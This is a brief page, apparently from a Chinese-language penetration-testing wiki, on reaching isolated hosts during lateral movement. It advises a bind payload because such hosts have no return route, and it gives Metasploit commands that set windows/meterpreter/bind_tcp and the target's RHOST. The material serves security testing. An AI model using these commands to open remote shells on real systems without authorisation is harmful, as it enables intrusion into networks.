> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/heng-xiang-yi-dong/ge-li-zhu-ji-payload.md).

# 隔离主机payload

```
隔离主机一般与攻击机无双向路由，payload设置为bind让靶机监听。
>set payload windows/meterpreter/bind_tcp
>set RHOST 隔离机IP
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/369.png)
